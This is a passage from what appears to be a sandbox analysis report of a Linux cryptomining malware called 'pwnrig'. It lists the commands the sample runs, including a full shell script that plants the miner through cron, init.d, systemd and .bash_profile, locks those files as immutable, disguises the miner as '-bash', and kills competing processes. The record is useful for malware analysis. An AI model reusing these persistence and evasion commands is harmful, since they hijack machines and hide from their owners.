>/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:3005 -
/usr/bin/idid -u4⤵PID:3006
-
-
/usr/bin/idid -u4⤵PID:3007
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:3008
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:3009
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:3010
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:3011
-
-
/usr/bin/idid -u4⤵PID:3012
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:3013
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3014
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3015
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:3016
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:3017
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3019
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3020
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:3021
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
PID:3022
-
-
/usr/bin/whichwhich chkconfig4⤵PID:3023
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:3024
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:3025
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:3026 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3027
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3027
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3027
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3027
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3053
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3053
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3053
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3053
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3079
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3080
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3080
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3080
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3080
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:3106
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:3107
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3109
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3110
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:3111
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3112
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3113
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3113
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3113
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3113
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3139
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3140
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3140
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3140
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
PID:3140
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3141
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3141
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3141
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3141
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:3167
-
-
/usr/bin/whichwhich systemctl4⤵PID:3168
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3169
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:3170
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:3171
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:3173
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:3174
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3175
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3176
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
PID:3202
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3228
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
PID:3254
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Writes file to tmp directory
PID:3311 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:3335 -
/usr/bin/hostnamehostname -I4⤵PID:3338
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3340
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:3345
-
-
/usr/bin/headhead -n 14⤵PID:3344
-
-
/usr/bin/grepgrep "Port "4⤵PID:3343
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:3342
-
-
/usr/bin/whoamiwhoami4⤵PID:3346
-
-
/usr/bin/hostnamehostname4⤵PID:3347
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3348
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3354
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3353
-
-
/usr/bin/cutcut -d: -f24⤵PID:3352
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵PID:3351
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3357
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3360
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3363
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3364
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3366
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
PID:3365
-
-
/usr/bin/idid -u4⤵PID:3368
-
-
/usr/bin/grepgrep -v grep4⤵PID:3371
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3370
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
PID:3369
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:3373 -
/usr/bin/idid -u4⤵PID:3374
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3379
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3378
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3377
-
-
/usr/bin/grepgrep -v grep4⤵PID:3376
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:3375
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:3381 -
/usr/bin/idid -u4⤵PID:3382
-
-
/usr/bin/wcwc -l4⤵PID:3388
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3387
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:3386
-
-
/usr/bin/grepgrep -v grep4⤵PID:3385
-
-
/usr/bin/psps aux4⤵
- Process Discovery
PID:3384
-
-
-
-
/usr/bin/crontabcrontab -r2⤵PID:3409
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵PID:3410
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
PID:3411
-
-
/usr/bin/bashbash -c "echo \"* * * * * /var/run/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:3412
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:3414
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:3415
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:3416
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵PID:3417
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:3418
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵PID:3419
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:3420
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵PID:3421
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:3422
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:3423
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:3424
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
PID:3425
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
PID:3426
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:3427
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:3428
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3429
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:3430 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3431
-
/usr/bin/hostnamehostname -I4⤵PID:3434
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3436
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:3441
-
-
/usr/bin/headhead -n 14⤵PID:3440
-
-
/usr/bin/grepgrep "Port "4⤵PID:3439
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:3438
-
-
/usr/bin/whoamiwhoami4⤵PID:3442
-
-
/usr/bin/hostnamehostname4⤵PID:3443
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3444
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3450
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3449
-
-
/usr/bin/cutcut -d: -f24⤵PID:3448
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3447
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3453
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3456
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3459
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3460
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3462
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:3461
-
-
/usr/bin/idid -u4⤵PID:3464
-
-
/usr/bin/grepgrep -v grep4⤵PID:3467
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3466
-
-
/usr/bin/psps x4⤵PID:3465
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr 